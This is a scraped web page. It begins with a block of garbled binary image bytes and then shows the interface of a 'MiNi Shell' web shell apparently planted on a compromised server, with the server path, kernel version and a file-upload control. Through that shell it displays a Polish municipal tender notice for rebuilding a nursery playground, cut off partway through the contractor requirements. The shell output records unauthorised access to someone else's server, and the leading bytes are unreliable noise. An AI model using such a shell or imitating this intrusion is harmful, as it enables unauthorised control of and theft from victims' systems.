JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250812/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250812/0037299701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa placu zabaw dla gminnego żłobka w Złotnikach Kujawskich </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Złotniki Kujawskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092350808</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Powstańców Wielkopolskich 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Złotniki Kujawskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">88-180</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL617 - Inowrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zlotnikikujawskie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zlotnikikuj.ires.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa placu zabaw dla gminnego żłobka w Złotnikach Kujawskich </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-036ded40-ab6a-455a-9475-c39c3846364c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00372997</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00049210/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Przebudowa placu zabaw dla Gminnego Żłobka w Złotnikach Kujawskich</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1158959 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/1158959</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo -aplikacyjne umożliwiające pracę na<br/>platformazakupowa.pl, tj.: a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, b) komputer<br/>klasy PC lub MAC o na stępującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,jeden z<br/>systemów operacyjnych - MS Windows 7,Mac Os x 10 4, Linux, lub ich nowsze wersje, c)zainstalowana dowolna przeglądarka<br/>internetowa, w przypadku Internet Explorer minimalnie wersja 100.,d) włączona obsługa JavaScript,e) zainstalowany program Adobe<br/>Acrobat Reader lub inny obsługujący format plików.pdf,f)Szyfrowanie na<br/>platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3,g) oznaczenie czasu odbioru danych przez Platformę stanowi datę<br/>oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Pozostałe wymagania zostały określone w SWZ oraz w regulaminie korzystania z platformy Open Nexus.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 RODO, zamawiający informuje, że:<br/>1) administratorem a w przypadku zamówień współfinansowanych ze środków UE(jeżeli dotyczy)również podmiotem<br/>przetwarzającym wszelkie dane osobowe osób fizycznych związanych z niniejszym postępowaniem jest Urząd Gminy Złotniki<br/>Kujawskie z siedzibą przy ul.Powstańców Wielkopolskich 6, 88-180 Złotniki Kujawskie,<br/>2) kontakt do inspektora ochrony danych osobowych: sekretariat@zlotnikikujawskie.pl<br/>3) dane osobowe przetwarzane będą na podstawie art. 6ust. 1 lit.c RODO w celu<br/>związanym z postępowaniem o udzielenie niniejszego zamówienia,<br/>4)odbiorcami ww.danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy oraz umowy dofinansowania (jeżeli dotyczy),<br/>5)ww. dane osobowe będą przechowywane odpowiednio:- przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia publicznego albo przez cały okres obowiązywania umowy w sprawie zamówienia publicznego - jeżeli okres<br/>obowiązywania umowy przekracza 4 lata; -przez okres,o którym mowa w art. 125 ust. 4 lit. d) w zw. z art. 140 rozporządzenia<br/>Parlamentu Europejskiego nr1303/2013 z dnia 17.12.2013 r. w przypadku zamówień współfinansowanych ze środków UE;- do czasu<br/>przeprowadzania archiwizacji dokumentacji - w zakresie określonym w przepisach o archiwizacji,<br/>6) obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy,<br/>7) w odniesieniu dodanych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22RODO,<br/>8) osoba fizyczna, której dane osobowe dotyczą posiada:a) na podstawie art. 15 RODO prawo dostępu do ww. danych osobowych.<br/>W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia o którym mowa<br/>w art. 15 ust. 1-3 RODO,zamawiający może żądać od osoby, występującej z żądaniem wskazania dodatkowych informacji,mających<br/>na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia; b) na podstawie art. 16 RODO prawo<br/>do sprostowania ww. danych osobowych(skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie<br/>niezgodnym z ustawą oraz nie może naruszać integralności protokołu postępowania oraz jego załączników); c) na podstawie art. 18<br/>RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych. Zgłoszenie żądania ograniczenia<br/>przetwarzania nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania. W przypadku, gdy wniesienie<br/>żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO,spowoduje ograniczenie przetwarzania danych zawartych w<br/>protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia<br/>zamawiający nie udostępnia tych danych, chyba, że zachodzą przesłanki, o których mowa w art. 18 ust. 2 RODO; d)prawo do<br/>wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy przetwarzanie danych osobowych narusza przepisy<br/>RODO,<br/>9) osobie fizycznej, której dane osobowe dotyczą nie przysługuje:a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do<br/>usunięcia danych osobowych;b)prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; c) na podstawie art.<br/>21RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">271.1.7.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Planowana inwestycja polega na doposażeniu w urządzenia zabawowe istniejącego placu zabaw, który znajduje się w<br/>miejscowości Złotniki Kujawskie i zlokalizowany jest na dz. nr ewid. 163/11 obr. 25.<br/>W zakresie planowanych prac przewiduje się demontaż części istniejących urządzeń wyposażenia terenu, relokację –<br/>przeniesienie niektórych urządzeń w inne miejsce, posadowienie nowych obiektów małej architektury w postaci urządzeń<br/>zabawowych, ogrodzenia niskiego oraz wykonanie nowej nitki związanej z usprawnieniem istniejącego odwodnienia terenu<br/>do istniejącej studzienki kanalizacji deszczowej na działce inwestora. Zaplanowano także wykonanie nawierzchni<br/>bezpiecznych piaskowych wraz z podbudową. Nawierzchnia ta zastosowana jest jako nawierzchnia amortyzująca dla<br/>niektórych urządzeń zabawowych na placu zabaw.<br/>Zakres inwestycji obejmuje:<br/>• Prace przygotowawcze do wykonania planowanych robót budowlanych,<br/>• Wykonanie planowanych demontaży wraz z segregacją wywozem i utylizacją,<br/>• Prace ziemne związane z miejscowym wyrównaniem terenu,<br/>• Prace związane z wykonaniem rur i systemu rozdzielaczowego wody z pomieszczenia socjalnego wewnątrz budynku i<br/>doprowadzenie do lokalizacji projektowanego urządzenia w terenie,<br/>• Prace ziemne związane z posadowieniem obiektów małej architektury i ogrodzenia niskiego,<br/>• Dostawa i montaż obiektów wyposażenia terenu,<br/>• Wykonanie przesadzenia w inne miejsce wskazanych gatunków drzew i krzewów,<br/>• Wykonanie rekultywacji trawnika w obszarze prowadzonych prac budowlanych,<br/>• Odbiór geodezyjny powykonawczy.<br/>2.PLANOWANY RAMOWY ZAKRES PRAC I KOLEJNOŚĆ WYKONYWANIA ROBÓT<br/>a. roboty przygotowawcze i terenowe<br/>• Oczyszczenie i zabezpieczenie terenu,<br/>• Zabezpieczenie istniejącej roślinności: drzew i krzewów,<br/>• Wytyczenie miejsca składowania,<br/>• Uprzątnięcie terenu z zalegających liści, patyków kamieni i śmieci wraz z utylizacją,<br/>• Ogrodzenie terenu ogrodzeniem budowlanym,<br/>b. demontaż istniejących obiektów małej architektury i ogrodzenia<br/>• Wykonanie prac związanych z demontażami wskazanych, istniejących obiektów i nawierzchni wraz z segregacją,<br/>wywozem i utylizacją<br/>• Zabezpieczenie obiektów przeznaczonych do ponownego montażu,<br/>• Prace ziemne związane z miejscowym wyrównaniem terenu,<br/>c. demontaż istniejących nawierzchni terenowych<br/>• Demontaż, rozbiórka wskazanej istniejącej nawierzchni utwardzonej wraz z podbudową,<br/>• Demontaż części istniejących obrzeży betonowych<br/>• Wyrównanie podłoża<br/>• Siew trawy w miejscu zdemontowanej nawierzchni<br/>d. wykonanie przyłączenia wody do punktu w terenie z pomieszczenia socjalnego w budynku<br/>• Wykonanie prac hydraulicznych związanych z przyłączeniem wody pod zlewem w pom. socjalnym,<br/>• Prace budowlane związane z przeprowadzeniem instalacji w posadzce budynku:<br/>- przejście przez ściany wewnętrzne i zewnętrzne budynku, skucie fragmentu posadzki,<br/>• Zabezpieczenie i uszczelnienie przejść instalacyjnych,<br/>• Odtworzenie fragmentu posadzki, prace glazurnicze, naprawcze, malarskie wewnątrz i na elewacji budynku,<br/>• Demontaż fragmentu nawierzchni utwardzonej, prace ziemne związane z wykopem pod przeprowadzenie instalacji,<br/>• Ułożenie instalacji w gruncie,<br/>• Sprawdzenie poprawności wykonania i działania instalacji,<br/>• Zasypanie i wyrównanie terenu,<br/>• Prace odtworzeniowe nawierzchni i trawnika,<br/>e. wykonanie systemu odwodnienia terenu do istniejącej sieci kanalizacji deszczowej na terenie własnym działki<br/>• Wykonanie prac ziemnych związanych z wykopami liniowymi pod ułożenie instalacji,<br/>• Ułożenie rur z projektowanymi spadkami w kierunku odbioru kanalizacji deszczowej,<br/>• Regulacja istniejących pokryw włazów – dostosowanie do rzędnych terenowych – zabezpieczenie przed potknięciem,<br/>• Wykonanie warstw stratygraficznych,<br/>• Zasypanie wykopu, wyrównanie terenu,<br/>f. montaż nowych i istniejących (w nowej lokalizacji) obiektów małej architektury, urządzeń zabawowych:<br/>• Wytyczenie lokalizacji planowanych obiektów,<br/>• Przygotowanie nowych i istniejących obiektów i urządzeń montażu<br/>• Oczyszczenie istniejących urządzeń zabawowych (zgodnie z zaleceniami producenta) i przygotowanie do ponownego<br/>montażu, sprawdzenie stanu technicznego i wykonanie ewentualnych drobnych napraw,<br/>• Prace ziemne związane z posadowieniem planowanych obiektów i urządzeń,<br/>• Posadowienie i montaż planowanych obiektów,<br/>• Prace ziemne związane z uzupełnieniem ubytków, dołków i nierówności w pobliżu wszystkich urządzeń zabawowych na<br/>obszarze całego placu zabaw,<br/>g. montaż ogrodzenia niskiego po relokacji oraz nowego ogrodzenia panelowego<br/>• Wytyczenie lokalizacji i przebiegu ogrodzenia,<br/>• Prace ziemne związane z posadowieniem słupków, przęseł ogrodzenia niskiego,<br/>• Posadowienie i montaż ogrodzenia niskiego,<br/>h. prace końcowe, porządkowe:<br/>• Uprzątnięcie terenu z narzędzi, pozostałości po pracach budowalnych,<br/>• Sprawdzenie terenu względem bezpieczeństwa użytkowania,<br/>• Rekultywacja, siew trawnika w miejscu prowadzonych prac,<br/>• Prace porządkowe<br/>Zestawienie i dane techniczne projektowanych obiektów i urządzeń<br/>(numeracja zgodna z numeracją na rysunkach technicznych)<br/>Na obszarze planowanej inwestycji zaprojektowano nawierzchnie piesze i nowe obiekty małej architektury.<br/>Jako nowe wyposażenie projektuje się następujące elementy:<br/>p-1.Zestaw zabawowy do zabawy wodą – 1 szt.<br/>p-2. Bujak sprężynowy – 1 szt.<br/>p-3. Bujak sprężynowy - samolot – 1 szt.<br/>p-4.Panel z kierownicą – 1 szt.<br/>p-5.Panel - tablica do rysowania – 1 szt.<br/>p-6. Panel - liczydło – 1 szt.<br/>p-7. Głuchy telefon – 2 szt.<br/>p-8. Huśtawka bocianie gniazdo – 1 szt.<br/>p-9. Zestaw zabawowy z organkami – 1 szt.<br/>p-10. Zestaw zabawowy statek – 1 szt.<br/>p-11. Zestaw zabawowy samochodzik – 1 szt.<br/>p-12. Żagiel zacieniający trójkąt pojedynczy – 1 szt.<br/>p-13. Żagiel zacieniający trójkąt podwójny – 1 szt.<br/>p-14. Ścieżka sensoryczna z poręczą – 1 szt.<br/>p-15. Tablica regulaminowa – 1 szt.<br/>p-16. Nawierzchnia z krążków drewnianych (moduły) – 8 szt.<br/>p-17. Donice do uprawy roślin – warzywniak – 2 szt.<br/>p-18. Tunel z wikliny dł. 6.0 mb – 1 szt.<br/>p-19. Ławka półokrągła (po łuku)<br/>p-20. Ławka okrągła – 1 szt.<br/>N-1 Nawierzchnia bezpieczna piaskowa<br/>T Trawnik (nawierzchnia, rekultywacja)<br/>K-1 Obrzeże betonowe (istn. naw. z kostki)<br/>K-2 Obrzeże gumowane (naw. piaskowa)<br/>Oi Ogrodzenie istniejące – zmiana lokalizacji<br/>Op Ogrodzenie projektowane, panelowe h=1,2 m<br/>Szczegółowy opis przedmiotu zamówienia zawiera Dokumentacja Projektowa, stanowiąca załącznik nr 8 do SWZ,<br/>Specyfikacja Techniczna Wykonania i Odbioru Robot (STWiOR) stanowiąca załącznik nr 9 do SWZ oraz projekt umowy,<br/>stanowiący załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112723-9 - Roboty w zakresie kształtowania placów zabaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45233250-6 - Roboty w zakresie nawierzchni, z wyjątkiem dróg</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia może się ubiegać wykonawca, który spełnia poniżej określone warunki udziału w postępowaniu<br/>dotyczące:<br/>1) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna, że wykonawca znajduje się w sytuacji ekonomicznej lub finansowej zapewniającej należyte wykonanie<br/>zamówienia, jeżeli wykonawca wykaże, że:<br/>a) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia, na sumę gwarancyjną nie niższą niż 200 000,00 zł.<br/>W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia ww. warunek wykonawcy ci mogą spełniać<br/>łącznie.<br/>2) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że wykonawca posiada wymagane zdolności techniczne lub zawodowe zapewniające należyte<br/>wykonanie zamówienia, jeżeli wykonawca wykaże, że:<br/>a) wykonał należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, co najmniej dwie roboty budowlane obejmujące swym zakresem budowę lub<br/>przebudowę lub modernizację lub remont placu zabaw. W przypadku wspólnego ubiegania się wykonawców o udzielenie<br/>zamówienia ww. warunek wykonawcy ci mogą spełniać łącznie.<br/>b) dysponuje lub będzie dysponować osobą (skierowaną przez wykonawcę do realizacji zamówienia) na z wymienione<br/>poniżej stanowisko:<br/>Kierownik budowy: posiadający uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej<br/>bez ograniczeń.<br/>Kierownik robót sanitarnych: posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane przez zamawiającego, które należy złożyć na wezwanie, o którym mowa w art. 274 ust. 1<br/>ustawy na potwierdzenie, że wykonawca spełnia warunki udziału w postępowaniu, o których mowa w Rozdziale V pkt 1 SWZ:<br/>1) dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego.<br/>W sytuacji gdy fakt opłacenia składek nie wynika z samej treści polisy, wykonawca winien załączyć do polisy inny dokument<br/>potwierdzający odprowadzenie stosownych składek;<br/>2) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a 